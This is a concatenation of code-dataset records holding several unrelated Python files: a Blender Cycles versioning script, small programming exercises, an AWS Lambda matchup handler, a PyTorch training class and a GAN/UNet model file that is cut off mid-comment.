bpy\n\nfrom bpy.app.handlers import persistent\n\n\ndef check_is_new_shading_ntree(node_tree):\n for node in node_tree.nodes:\n # If material has any node with ONLY new shading system\n # compatibility then it's considered a Cycles material\n # and versioning code would need to perform on it.\n #\n # We can not check for whether NEW_SHADING in compatibility\n # because some nodes could have compatibility with both old\n # and new shading system and they can't be used for any\n # decision here.\n if node.shading_compatibility == {'NEW_SHADING'}:\n return True\n\n # If node is only compatible with old shading system\n # then material can not be Cycles material and we\n # can stopiterating nodes now.\n if node.shading_compatibility == {'OLD_SHADING'}:\n return False\n return False\n\n\ndef check_is_new_shading_material(material):\n if not material.node_tree:\n return False\n return check_is_new_shading_ntree(material.node_tree)\n\n\ndef check_is_new_shading_world(world):\n if not world.node_tree:\n return False\n return check_is_new_shading_ntree(world.node_tree)\n\n\ndef check_is_new_shading_lamp(lamp):\n if not lamp.node_tree:\n return False\n return check_is_new_shading_ntree(lamp.node_tree)\n\n\ndef foreach_notree_node(nodetree, callback, traversed):\n if nodetree in traversed:\n return\n traversed.add(nodetree)\n for node in nodetree.nodes:\n callback(node)\n if node.bl_idname == 'ShaderNodeGroup':\n foreach_notree_node(node.node_tree, callback, traversed)\n\n\ndef foreach_cycles_node(callback):\n traversed = set()\n for material in bpy.data.materials:\n if check_is_new_shading_material(material):\n foreach_notree_node(material.node_tree,\n callback,\n traversed)\n for world in bpy.data.worlds:\n if check_is_new_shading_world(world):\n foreach_notree_node(world.node_tree,\n callback,\n traversed)\n for lamp in bpy.data.lamps:\n if check_is_new_shading_world(lamp):\n foreach_notree_node(lamp.node_tree,\n callback,\n traversed)\n\n\ndef mapping_node_order_flip(node):\n \"\"\"\n Flip euler order of mapping shader node\n \"\"\"\n if node.bl_idname == 'ShaderNodeMapping':\n rot = node.rotation.copy()\n rot.order = 'ZYX'\n quat = rot.to_quaternion()\n node.rotation = quat.to_euler('XYZ')\n\n\n@persistent\ndef do_versions(self):\n # We don't modify startup file because it assumes to\n # have all the default values only.\n if not bpy.data.is_saved:\n return\n\n # Clamp Direct/Indirect separation in 270\n if bpy.data.version <= (2, 70, 0):\n for scene in bpy.data.scenes:\n cscene = scene.cycles\n sample_clamp = cscene.get(\"sample_clamp\", False)\n if (sample_clamp and\n not cscene.is_property_set(\"sample_clamp_direct\") and\n not cscene.is_property_set(\"sample_clamp_indirect\")):\n\n cscene.sample_clamp_direct = sample_clamp\n cscene.sample_clamp_indirect = sample_clamp\n\n # Change of Volume Bounces in 271\n if bpy.data.version <= (2, 71, 0):\n for scene in bpy.data.scenes:\n cscene = scene.cycles\n if not cscene.is_property_set(\"volume_bounces\"):\n cscene.volume_bounces = 1\n\n # Caustics Reflective/Refractive separation in 272\n if bpy.data.version <= (2, 72, 0):\n for scene in bpy.data.scenes:\n cscene = scene.cycles\n if (cscene.get(\"no_caustics\", False) and\n not cscene.is_property_set(\"caustics_reflective\") and\n not cscene.is_property_set(\"caustics_refractive\")):\n\n cscene.caustics_reflective = False\n cscene.caustics_refractive = False\n\n # Euler order was ZYX in previous versions.\n if bpy.data.version <= (2, 73, 4):\n foreach_cycles_node(mapping_node_order_flip)\n","repo_name":"Squashwell/bepuik","sub_path":"intern/cycles/blender/addon/version_update.py","file_name":"version_update.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"53"} +{"seq_id":"23090264611","text":"#!/usr/bin/env python3\n\ndef between_markers(text:str, begin:str, end:str)-> str:\n if begin in text:\n begin_index = text.find(begin) + len(begin)\n else:\n begin_index = 0\n\n if end in text:\n end_index = text.find(end)\n else:\n end_index = len(text)\n return text[begin_index:end_index]\n\n\n\n\ndef between_markers_2(text: str, begin: str, end: str) -> str:\n\n m1 = 0 if text.find(begin) < 0 else text.find(begin) + len(begin)\n\n m2 = len(text) if text.find(end) < 0 else text.find(end)\n\n return text[m1:m2]\n\n\n\nif __name__ == '__main__':\n print(between_markers('What is >apple<', '>','<'))\n","repo_name":"phuonghtruong/python","sub_path":"Checkio/between_markers.py","file_name":"between_markers.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13888890961","text":"from built.evaluation_scheduler import EvaluationScheduler\nimport os\nimport math\nimport time\nimport logging\nimport torch\nimport tqdm\nimport numpy as np\nimport wandb\nimport pandas as pd\n\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader\nfrom collections import defaultdict\n\n\nfrom built.builder import Builder\nfrom built.checkpoint_manager import CheckpointManager\nfrom built.early_stopper import EarlyStopper\nfrom built.logger import LogWriter, WandbWriter\nfrom built.utils.util_functions import *\n\nclass TrainerBase(object):\n \"\"\"Train and evaluate a model according to the configuration\"\"\"\n def __init__(self, config, builder, wandb_run=None, wandb_conf=None, working_dir=None, use_accelerator=False):\n\n self.config = config\n\n seed_everything(self.config.train.random_state)\n\n self.builder = builder\n self.es = EarlyStopper(mode=config.train.early_stopper.mode) \n self.eval_scheduler = EvaluationScheduler(config.evaluation.boundary_scores, config.evaluation.intervals)\n self.wandb_run = wandb_run\n self.wandb_conf = wandb_conf\n self.working_dir = working_dir\n\n if self.working_dir is None:\n self.working_dir = os.path.join(self.config.train.dir, self.config.train.name)\n \n self.cm = CheckpointManager(self.working_dir)\n\n if self.wandb_run is None:\n self.writer = LogWriter()\n else:\n self.writer = WandbWriter(run=self.wandb_run)\n\n self.use_accelerator = use_accelerator\n if self.use_accelerator:\n from accelerate import Accelerator\n\n self.accelerator = Accelerator()\n self.device = self.accelerator.device\n else:\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') \n\n self.build_classes()\n\n def prepare_directories(self):\n os.makedirs(os.path.join(self.working_dir,\n 'checkpoint'), exist_ok=True)\n\n # deprecated, need to check and improve\n def forward(self):\n self.model.eval()\n\n for dataloader in self.dataloaders:\n dataloader = dataloader['dataloader']\n \n batch_size = self.config.evaluation.batch_size\n total_size = len(dataloader.dataset)\n total_step = math.ceil(total_size / batch_size)\n \n all_outputs = []\n all_targets = None\n aggregated_metric_dict = defaultdict(list)\n epoch = 0\n with torch.no_grad():\n tbar = tqdm.tqdm(enumerate(dataloader), total=total_step, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}')\n for i, (inputs, targets) in tbar:\n output = self.forward_hook(self.model, inputs, targets, device=self.device)\n output = self.post_forward_hook(\n outputs=output, inputs=inputs, targets=targets, data=None, is_train=True)\n\n metric_dict = self.metric_fn(\n outputs=output, targets=targets, data=inputs, is_train=False) \n\n log_dict = {}\n log_dict['lr'] = self.optimizer.param_groups[0]['lr']\n log_dict.update(metric_dict)\n\n for key, value in log_dict.items():\n aggregated_metric_dict[key].append(value)\n \n f_epoch = epoch + i / total_step\n\n if isinstance(output, list) or isinstance(output, tuple):\n for i in range(len(output)):\n if len(all_outputs) < len(output):\n all_outputs.append([])\n all_outputs[i].append(output[i])\n else:\n all_outputs.append(output)\n \n if isinstance(targets, dict):\n if all_targets is None:\n all_targets = defaultdict(list)\n \n for k in targets:\n all_targets[k].append(targets[k]) \n else:\n if all_targets is None:\n all_targets = [] \n all_targets.append(targets)\n \n self.logger_fn(self.writer, split='test', outputs=output, labels=targets, data=inputs,\n log_dict=log_dict, epoch=epoch, step=i, num_steps_in_epoch=total_step)\n\n aggregated_metric_dict = {f'avg_{key}':np.mean(value) for key, value in aggregated_metric_dict.items()}\n self.logger_fn(self.writer, split='test', outputs=all_outputs, labels=all_targets,\n log_dict=aggregated_metric_dict, epoch=epoch) \n \n if isinstance(all_outputs[0], list):\n for i in range(len(all_outputs)):\n all_outputs[i] = torch.cat(all_outputs[i], dim=0)\n else:\n all_outputs = torch.cat(all_outputs, dim=0)\n \n if isinstance(all_targets, dict):\n for k in all_targets:\n if isinstance(all_targets[k][0], torch.Tensor):\n all_targets[k] = torch.cat(all_targets[k], dim=0)\n else:\n # if it's a list, \n tmp = []\n for v in all_targets[k]:\n tmp.extend(v)\n all_targets[k] = tmp\n else:\n all_targets = torch.cat(all_targets, dim=0)\n \n return all_outputs, all_targets\n\n # def evaluate_single_epoch(self, dataloader, epoch, split):\n # self.model.eval()\n\n # batch_size = self.config.evaluation.batch_size\n # total_size = len(dataloader.dataset)\n # total_step = math.ceil(total_size / batch_size)\n\n # with torch.no_grad():\n # all_outputs = []\n # all_targets = None\n # aggregated_metric_dict = defaultdict(list)\n # tbar = tqdm.tqdm(enumerate(dataloader), total=total_step, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}')\n # for i, (inputs, targets) in tbar:\n # output = self.forward_hook(self.model, inputs, targets, device=self.device)\n # output = self.post_forward_hook(\n # outputs=output, inputs=inputs, targets=targets, data=None, is_train=True)\n\n # loss = self.loss_fn(output, targets, device=self.device)\n\n # if isinstance(loss, dict):\n # loss_dict = loss\n # loss = loss_dict['loss']\n # else:\n # loss_dict = {'loss': loss}\n\n # metric_dict = self.metric_fn(\n # outputs=output, targets=targets, data=inputs, is_train=False) \n\n # log_dict = {key: value.item() for key, value in loss_dict.items()}\n # log_dict['lr'] = self.optimizer.param_groups[0]['lr']\n # log_dict.update(metric_dict)\n\n # for key, value in log_dict.items():\n # aggregated_metric_dict[key].append(value)\n\n # f_epoch = epoch + i / total_step\n # tbar.set_description(f'[ val ] {f_epoch: .2f} epoch')\n # tbar.set_postfix(\n # lr=self.optimizer.param_groups[0]['lr'], loss=f'{loss.item():.5f}')\n \n # if isinstance(output, list) or isinstance(output, tuple):\n # for i in range(len(output)):\n # if len(all_outputs) < len(output):\n # all_outputs.append([])\n # all_outputs[i].append(output[i])\n # else:\n # all_outputs.append(output)\n \n # if isinstance(targets, dict):\n # if all_targets is None:\n # all_targets = defaultdict(list)\n \n # for k in targets:\n # all_targets[k].append(targets[k]) \n # else:\n # if all_targets is None:\n # all_targets = [] \n # all_targets.append(targets)\n \n # self.logger_fn(self.writer, split=split, outputs=output, labels=targets, data=inputs,\n # log_dict=log_dict, epoch=epoch, step=i, num_steps_in_epoch=total_step)\n \n # aggregated_metric_dict = {f'avg_{key}':np.mean(value) for key, value in aggregated_metric_dict.items()}\n # self.logger_fn(self.writer, split=split, outputs=all_outputs, labels=all_targets,\n # log_dict=aggregated_metric_dict, epoch=epoch)\n # return aggregated_metric_dict[f'[{split}]_avg_score']\n\n # def train_single_epoch(self, dataloader, epoch, split):\n # self.model.train()\n\n # # loop calc\n # batch_size = self.config.train.batch_size\n # total_size = len(dataloader.dataset)\n # total_step = math.ceil(total_size / batch_size)\n\n # tbar = tqdm.tqdm(enumerate(dataloader), total=total_step, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}')\n # for i, (inputs, targets) in tbar:\n # output = self.forward_hook(self.model, inputs, targets, device=self.device)\n # output = self.post_forward_hook(\n # outputs=output, inputs=inputs, targets=targets, data=None, is_train=True)\n\n # loss = self.loss_fn(output, targets, device=self.device)\n\n # metric_dict = self.metric_fn(\n # outputs=output, targets=targets, data=inputs, is_train=True)\n\n # if isinstance(loss, dict):\n # loss_dict = loss\n # loss = loss_dict['loss']\n # else:\n # loss_dict = {'loss': loss}\n\n # # backward()\n # loss.backward()\n\n # # optimizer \n # if self.config.train.gradient_accumulation_step is None:\n # self.optimizer.step()\n # self.optimizer.zero_grad()\n # elif (i+1) % self.config.train.gradient_accumulation_step == 0:\n # self.optimizer.step()\n # self.optimizer.zero_grad()\n\n # log_dict = {key: value.item() for key, value in loss_dict.items()}\n # log_dict['lr'] = self.optimizer.param_groups[0]['lr']\n # log_dict.update(metric_dict)\n # log_dict.update({'epoch': epoch})\n\n # f_epoch = epoch + i / total_step\n # tbar.set_description(f'[train] {f_epoch: .2f} epoch')\n # tbar.set_postfix(\n # lr=self.optimizer.param_groups[0]['lr'], loss=f'{loss.item():.5f}')\n\n # self.logger_fn(self.writer, split=split, outputs=output, labels=targets,\n # log_dict=log_dict, epoch=epoch, step=i, num_steps_in_epoch=total_step)\n\n def calc_steps(self, dataloader, is_train):\n if is_train: \n batch_size = self.config.train.batch_size\n else:\n batch_size = self.config.evaluation.batch_size\n\n total_size = len(dataloader.dataset)\n total_step = math.ceil(total_size / batch_size)\n return total_step, batch_size\n\n def process_single_epoch(self, dataloader: DataLoader, epoch: int, is_train: bool, use_tbar: bool=True) -> float:\n self.model.train(is_train) \n \n total_step, batch_size = self.calc_steps(dataloader, is_train)\n logger = self.builder.build_logger_fn(self.config, writer=self.writer, epoch=epoch, total_step=total_step, is_train=is_train)\n metric = self.builder.build_metric_fn(self.config)\n self.eval_scheduler.total_step = total_step\n \n with torch.set_grad_enabled(is_train):\n all_outputs = []\n all_targets = None\n \n if use_tbar:\n tbar = tqdm.tqdm(enumerate(dataloader), total=total_step, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}')\n else:\n tbar = enumerate(dataloader)\n \n for step, (inputs, targets) in tbar:\n outputs = self.forward_hook(self.model, inputs, targets, device=self.device)\n # outputs = self.post_forward_hook(\n # outputs=outputs, inputs=inputs, targets=targets, data=None, is_train=True)\n\n loss = self.loss_fn(outputs, targets, device=self.device)\n if isinstance(loss, dict):\n loss_dict = loss\n loss = loss_dict['loss']\n else:\n loss_dict = {'loss': loss}\n \n lr = self.optimizer.param_groups[0]['lr']\n\n if not is_train:\n self.aggregate(all_outputs, outputs, all_targets, targets)\n\n logger.batch_size = outputs.shape[0]\n logger.log('lr', lr, step)\n logger.log_dict(loss_dict, step)\n logger.log_dict(metric.calculate(outputs=outputs, targets=targets, extra_data=inputs, is_train=is_train), step)\n \n logger.write(step)\n\n if is_train:\n self.backward(loss=loss, step=step)\n\n if use_tbar:\n tbar.set_postfix(epoch=f'{epoch}', step=step, lr=lr, loss=f'{logger.loss:.5f}', score=f'{logger.score:.5f}')\n\n schedule_counter = (total_step * epoch) + step\n if is_train and self.eval_scheduler.scheduled(schedule_counter):\n tbar.set_description('evaluation...')\n val_score = self.process_single_epoch(self.val_dataloader, epoch, is_train=False, use_tbar=False)\n _, save_ckpt = self.es(val_score)\n if save_ckpt: \n tbar.set_description(f'best: {val_score}')\n self.cm.save(self.model, self.optimizer, epoch, val_score, keep=1, only_state_dict=self.config.train.save_state_dict_only)\n else:\n tbar.set_description(f'current: {val_score}')\n\n self.eval_scheduler.update(schedule_counter, val_score)\n self.model.train(is_train) \n\n return logger.score\n\n def backward(self, loss, step):\n if self.use_accelerator:\n self.accelerator.backward(loss)\n else:\n loss.backward()\n\n if self.config.train.gradient_accumulation_step is None:\n self.optimizer.step()\n self.scheduler.step()\n self.optimizer.zero_grad()\n elif (step+1) % self.config.train.gradient_accumulation_step == 0:\n self.optimizer.step()\n self.scheduler.step()\n self.optimizer.zero_grad()\n else:\n pass\n\n \n def aggregate(self, all_outputs, outputs, all_targets, targets):\n if isinstance(outputs, list) or isinstance(outputs, tuple):\n for i in range(len(outputs)):\n if len(all_outputs) < len(outputs):\n all_outputs.append([])\n all_outputs[i].append(outputs[i])\n else:\n all_outputs.append(outputs)\n \n if isinstance(targets, dict):\n if all_targets is None:\n all_targets = defaultdict(list)\n \n for k in targets:\n all_targets[k].append(targets[k]) \n else:\n if all_targets is None:\n all_targets = [] \n all_targets.append(targets)\n\n def train(self, last_epoch, last_accuracy=None):\n ckpt_score = last_accuracy\n\n s_time = time.time()\n for epoch in range(last_epoch + 1, self.config.train.num_epochs):\n torch.cuda.synchronize()\n self.process_single_epoch(self.train_dataloader, epoch, is_train=True)\n torch.cuda.synchronize()\n\n e_time = time.time() \n print(f'Total time for training: {e_time - s_time} seconds.')\n \n return self.es.best_score\n\n def build_classes(self):\n # prepare directories\n self.prepare_directories()\n\n # build dataloaders\n self.dataloaders = self.builder.build_dataloaders(self.config)\n\n # build model\n self.model = self.builder.build_model(self.config)\n self.model = self.model.to(self.device)\n\n # build loss\n self.loss_fn = self.builder.build_loss_fn(self.config)\n\n # build hooks\n self.forward_hook = self.builder.build_forward_hook(self.config)\n self.post_forward_hook = self.builder.build_post_forward_hook(self.config)\n\n # build optimizer\n if 'use_custom_params' in self.config.optimizer and self.config.optimizer.use_custom_params:\n get_optim_param_fn = self.builder.build_optimizer_param_fn(self.config)\n optimizer_parameters = get_optim_param_fn(list(self.model.named_parameters()))\n else:\n optimizer_parameters = self.model.parameters()\n\n for d in self.dataloaders:\n is_train = d['mode']\n \n if is_train:\n self.train_dataloader = d['dataloader']\n else:\n self.val_dataloader = d['dataloader']\n \n self.total_steps = int(len(self.train_dataloader.dataset) / self.config.train.batch_size * self.config.train.num_epochs)\n self.optimizer = self.builder.build_optimizer(self.config, params=optimizer_parameters, total_steps=self.total_steps)\n\n if self.use_accelerator:\n self.model, self.optimizer, self.dataloaders[0]['dataloader'], self.dataloaders[1]['dataloader'] = self.accelerator.prepare(\n self.model, self.optimizer, self.dataloaders[0]['dataloader'], self.dataloaders[1]['dataloader'])\n\n\n def run(self): \n last_epoch, step, last_accuracy = -1, -1, None \n\n if self.config.train.continue_from_last_checkpoint:\n # load checkpoint\n ckpt = self.cm.latest()\n if ckpt is not None:\n last_epoch, step, last_accuracy = self.cm.load(self.model, self.optimizer, ckpt)\n\n # build scheduler\n self.scheduler = self.builder.build_scheduler(\n self.config, optimizer=self.optimizer, last_epoch=last_epoch, total_steps=self.total_steps)\n\n # train loop\n best_score = self.train(last_epoch=last_epoch, last_accuracy=last_accuracy)\n return best_score\n","repo_name":"UoA-CARES/BuilT","sub_path":"built/trainer_base.py","file_name":"trainer_base.py","file_ext":"py","file_size_in_byte":18964,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"70096159528","text":"# importing pygame\nimport pygame\n\n# initialize pygame modules\npygame.init()\n\n# define background color\nbgOrange = (255, 165, 0)\nbgBlue = (0, 0, 205)\n\n# define scren Settings\nsize = (400, 400)\nscreen = pygame.display.set_mode(size, pygame.FULLSCREEN)\npygame.mouse.set_visible(False)\n\n# define main loop parameters and start the main loop\nFPS = 60 # frames per second (FPS)\nclock = pygame.time.Clock() # create pygame clock instance\nrunning = True # boolean value to control main loop\n\n# start main loop\nwhile running:\n\n # limiting the while loop to FPS (60 times per second)\n clock.tick(FPS)\n # fill screen with orange\n screen.fill(bgOrange)\n # draw everything to foreground for 3 seconds\n pygame.display.flip()\n pygame.time.wait(3000)\n # change screen color to blue\n screen.fill(bgBlue)\n #draw everything again\n pygame.display.flip()\n # wait for another 4.5 seconds then end the program\n pygame.time.wait(4500)\n # program ran for 7.5 seconds in total, so now let's exit\n running = False\n\n# quit program\npygame.quit()\n","repo_name":"imarevic/psy_python_course","sub_path":"labsolutions/L6_ex1_solution.py","file_name":"L6_ex1_solution.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"36362374974","text":"\"\"\"\nDefine tres arrays de 20 números enteros cada uno, con nombres numbers, squares y cubes.\nCarga el array numbers con valores aleatorios entre 0 y 100.\nEn el array squares se deben almacenar los cuadrados de los valores que hay en el array numbers.\nEn el array cubes se deben almacenar los cubos de los valores que hay en numbers.\nA continuación, muestra el contenido de los tres arrays dispuesto en tres columnas.\n\"\"\"\nimport random\n\nLEN_ARRAY = 20\nMIN_NUMBER = 0\nMAX_NUMBER = 100\n\nnumbers = [random.randint(MIN_NUMBER, MAX_NUMBER) for _ in range(LEN_ARRAY)]\nsquares = [n ** 2 for n in numbers]\ncubes = [n ** 3 for n in numbers]\n\nfor i in range(LEN_ARRAY):\n print(f\"{numbers[i]:3} {squares[i]:5} {cubes[i]:7}\")","repo_name":"rdelcastillo/DAW-Python","sub_path":"ej03arrays/0_unidimensionales/uni_ej03.py","file_name":"uni_ej03.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"es","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"70549071529","text":"import json\n\nfrom Fetcher import Fetcher\nfrom MatchupRandomizer import MatchupRandomizer\n\nparameter_keys = ['n_cycles', 'current_season', 'current_cycle']\n\ndef get_response(statusCode=200, body='', message=''):\n return {\n 'statusCode': statusCode,\n 'headers': {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(dict(data=body, message=message))\n }\n\ndef handler(event, context):\n try:\n body = json.loads(event['body'])\n\n error_message = ''\n\n # build a string of errors if keys n_cycles, current_season, current_cycle are not in body or type is not int\n for key in parameter_keys:\n if 'n_cycles' not in body or not isinstance(body['n_cycles'], int):\n error_message += f'Key \"{key}\" missing or is not of type int.\\n'\n \n if error_message != '':\n return get_response(400, message=error_message)\n\n # parameters\n n_cycles = body['n_cycles']\n current_season = body['current_season']\n current_cycle = body['current_cycle']\n\n fetcher = Fetcher(\n current_season=current_season,\n n_cycles=n_cycles\n )\n\n data_by_tiers_season_cycle, data_by_matchups_season_cycle = fetcher.fetch_data()\n\n matchupRandomizer = MatchupRandomizer(\n data_by_matchups_season_cycle=data_by_matchups_season_cycle,\n data_by_tiers_season_cycle=data_by_tiers_season_cycle,\n current_season=current_season,\n current_cycle=current_cycle\n )\n\n matchups = matchupRandomizer.get_matchups()\n except Exception as e:\n print(e)\n\n return get_response(statusCode=500, message=str(e))\n\n return get_response(body=matchups)","repo_name":"vadManuel/dash-league-randomizer","sub_path":"back/DashLeagueFetcher/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44252419245","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom .my_utils import display_progress, display_results\n\n\nclass UnGAN(nn.Module):\n\n def __init__(self,\n generator,\n discriminator,\n classifier,\n gen_optimizer,\n dsc_optimizer,\n cls_optimizer,\n adv_loss,\n cls_loss,\n num_classes=10,\n display_step=1):\n\n super().__init__()\n self.gen = generator\n self.dsc = discriminator\n self.cls = classifier\n\n self.gen_opt = gen_optimizer\n self.dsc_opt = dsc_optimizer\n self.cls_opt = cls_optimizer\n self.adversarial_criterion = adv_loss\n self.cls_criterion = cls_loss\n\n self.display_step = display_step\n self.num_classes = num_classes\n\n def dsc_step(self, real_images, conditions):\n self.gen.eval()\n self.dsc.train()\n self.dsc.zero_grad()\n bs = real_images.size(0)\n\n # train discriminator on real\n real_labels = torch.ones(bs, 1).type_as(real_images)\n real_logits = self.dsc(real_images)\n D_real_loss = self.adversarial_criterion(real_logits, real_labels)\n\n # train discriminator on facke\n fake_labels = torch.zeros(bs, 1).type_as(real_images)\n fake_images = self.gen(conditions)\n fake_logits = self.dsc(fake_images)\n D_fake_loss = self.adversarial_criterion(fake_logits, fake_labels)\n\n # gradient backprop & optimize ONLY self.dsc's parameters\n D_loss = D_real_loss + D_fake_loss\n D_loss.backward()\n self.dsc_opt.step()\n\n # return D_loss.data.item(), D_fake_loss.data.item(), D_real_loss.data.item()\n return D_loss.data.item()\n\n def gen_step(self, conditions):\n self.dsc.eval()\n self.gen.train()\n self.gen.zero_grad()\n bs = conditions.size(0)\n\n # train generator to fool discriminator\n fake_labels = torch.ones(bs, 1).cuda()\n fake_images = self.gen(conditions)\n fake_logits = self.dsc(fake_images)\n G_loss = self.adversarial_criterion(fake_logits, fake_labels)\n\n # gradient backprop & optimize ONLY self.gen's parameters\n G_loss.backward()\n self.gen_opt.step()\n\n return G_loss.data.item()\n\n def cls_step(self, conditions):\n self.gen.eval()\n # self.gen.train()\n # self.gen.zero_grad()\n self.cls.train()\n self.cls.zero_grad()\n\n # train generator to fool discriminator\n fake_images = self.gen(conditions, drop=True)\n fake_predicted_cls = self.cls(fake_images)\n C_loss = self.cls_criterion(fake_predicted_cls, conditions)\n C_loss.backward()\n self.cls_opt.step()\n # self.gen_opt.step()\n\n return C_loss.data.item()\n\n def get_acc(self, conditions):\n self.gen.eval()\n self.cls.eval()\n bs = conditions.size(0)\n # train generator to fool discriminator\n fake_images = self.gen(conditions)\n fake_predicted_cls = self.cls(fake_images)\n acc = torch.eq(fake_predicted_cls.argmax(dim=-1), conditions).sum() / bs\n return acc.item()\n\n def fit(self, dataloader, n_epoch, device, log_dir, logger):\n # Init\n writer = SummaryWriter(f'{log_dir}/tensorboard')\n n_iters = 0\n # Train\n figs = []\n for epoch in range(1, n_epoch + 1):\n for batch_index, (real_images, _) in enumerate(dataloader):\n real_images = real_images.to(device)\n class_labels = torch.randint(self.num_classes, size=[real_images.size(0)]).to(device)\n\n loss_d = self.dsc_step(real_images, class_labels)\n loss_g = self.gen_step(class_labels)\n writer.add_scalars('adv_loss', {'loss_d': loss_d, 'loss_g': loss_g}, n_iters)\n\n if batch_index % 10 == 0:\n loss_c = self.cls_step(class_labels.to(device))\n writer.add_scalar('cls_loss', loss_c, n_iters)\n acc_c = self.get_acc(class_labels)\n writer.add_scalar('cls_acc', acc_c, n_iters)\n n_iters += 1\n logger.info(f'[{epoch:03d}/{n_epoch}]: loss_d: {loss_d:.3f}, loss_g: {loss_g:.3f}, acc_c: {acc_c:.2%}')\n\n if epoch % self.display_step == 0:\n fake_images = self.gen(class_labels.to(device))\n fig = display_progress(epoch, class_labels[:4], fake_images[:4], real_images[:4],\n save_fig=f'{log_dir}/figures')\n figs.append(fig)\n torch.save(self.gen.state_dict(), f'{log_dir}/checkpoints/G_epoch{epoch}.pth')\n torch.save(self.dsc.state_dict(), f'{log_dir}/checkpoints/D_epoch{epoch}.pth')\n torch.save(self.cls.state_dict(), f'{log_dir}/checkpoints/C_epoch{epoch}.pth')\n\n # Save results\n writer.add_figure('figures', figs)\n fake_images = self.gen(class_labels[:64].to(device))\n display_results(class_labels[:64], fake_images, title='Generated Conditional Images',\n save_fig=f'{log_dir}/figures/gen_result.jpg')\n\n pred = self.cls(real_images[:64].to(device)).argmax(-1)\n display_results(pred, real_images[:64], title='Classified Test Images',\n save_fig=f'{log_dir}/figures/cls_result.jpg')\n\n\nclass DownSampleConv(nn.Module):\n\n def __init__(self, in_channels, out_channels, kernel=4, strides=2, padding=1, activation=True, batchnorm=True):\n \"\"\"\n Paper details:\n - C64-C128-C256-C512-C512-C512-C512-C512\n - All convolutions are 4×4 spatial filters applied with stride 2\n - Convolutions in the encoder downsample by a factor of 2\n \"\"\"\n super().__init__()\n self.activation = activation\n self.batchnorm = batchnorm\n\n self.conv = nn.Conv2d(in_channels, out_channels, kernel, strides, padding)\n\n if batchnorm:\n self.bn = nn.BatchNorm2d(out_channels)\n\n if activation:\n self.act = nn.LeakyReLU(0.2)\n\n def forward(self, x):\n x = self.conv(x)\n if self.batchnorm:\n x = self.bn(x)\n if self.activation:\n x = self.act(x)\n return x\n\n\nclass UpSampleConv(nn.Module):\n\n def __init__(self, in_channels, out_channels, kernel=4, strides=2, padding=1, activation=True, batchnorm=True,\n dropout=False):\n super().__init__()\n self.activation = activation\n self.batchnorm = batchnorm\n self.dropout = dropout\n\n self.deconv = nn.ConvTranspose2d(in_channels, out_channels, kernel, strides, padding)\n\n if batchnorm:\n self.bn = nn.BatchNorm2d(out_channels)\n\n if activation:\n self.act = nn.ReLU(True)\n\n if dropout:\n self.drop = nn.Dropout2d(0.5)\n\n def forward(self, x):\n x = self.deconv(x)\n if self.batchnorm:\n x = self.bn(x)\n\n if self.dropout:\n x = self.drop(x)\n return x\n\n\nclass UnetGenerator(nn.Module):\n\n def __init__(self, in_channels, out_channels):\n super().__init__()\n # encoder/donwsample convs\n self.encoders = [DownSampleConv(in_channels, 64, batchnorm=False), # bs x 128 x 64 x 64\n DownSampleConv(64, 128), # bs x 256 x 32 x 32\n DownSampleConv(128, 256), # bs x 512 x 16 x 16\n DownSampleConv(256, 512), # bs x 512 x 8 x 8\n DownSampleConv(512, 512), # bs x 512 x 4 x 4\n DownSampleConv(512, 512), # bs x 512 x 2 x 2\n DownSampleConv(512, 512, batchnorm=False), # bs x 512 x 1 x 1\n ]\n\n # decoder/upsample convs\n self.decoders = [UpSampleConv(512, 512, dropout=True), # bs x 512 x 2 x 2\n UpSampleConv(1024, 512, dropout=True), # bs x 512 x 4 x 4\n UpSampleConv(1024, 512, dropout=True), # bs x 512 x 8 x 8\n UpSampleConv(1024, 256), # bs x 512 x 16 x 16\n UpSampleConv(512, 128), # bs x 256 x 32 x 32\n UpSampleConv(256, 64), # bs x 128 x 64 x 64\n ]\n self.decoder_channels = [512, 512, 512, 512, 256, 128, 64]\n self.final_conv = nn.ConvTranspose2d(64, out_channels, kernel_size=4, stride=2, padding=1)\n self.tanh = nn.Tanh()\n\n self.encoders = nn.ModuleList(self.encoders)\n self.decoders = nn.ModuleList(self.decoders)\n\n def forward(self, x):\n skips_cons = []\n for encoder in self.encoders:\n x = encoder(x)\n\n skips_cons.append(x)\n\n skips_cons = list(reversed(skips_cons[:-1]))\n decoders = self.decoders[:-1]\n\n for decoder, skip in zip(decoders, skips_cons):\n x = decoder(x)\n # print(x.shape, skip.shape)\n x = torch.cat((x, skip), axis=1)\n\n x = self.decoders[-1](x)\n # print(x.shape)\n x = self.final_conv(x)\n return self.tanh(x)\n\n\n# class CA_NET(nn.Module):\n# # some code is modified from vae examples\n# # (https://github.com/pytorch/examples/blob/master/vae/main.py)\n# def __init__(self):\n# super(CA_NET, self).__init__()\n# self.t_dim = 100\n# self.c_dim = 100\n# self.fc = nn.Linear(self.t_dim, self.c_dim * 2, bias=True)\n# self.relu = nn.ReLU()\n#\n# def encode(self, text_embedding):\n# x = self.relu(self.fc(text_embedding))\n# mu = x[:, :self.c_dim]\n# logvar = x[:, self.c_dim:]\n# return mu, logvar\n#\n# def reparametrize(self, mu, logvar):\n# std = logvar.mul(0.5).exp_()\n# eps = torch.cuda.FloatTensor(std.size()).normal_()\n# eps = Variable(eps)\n# 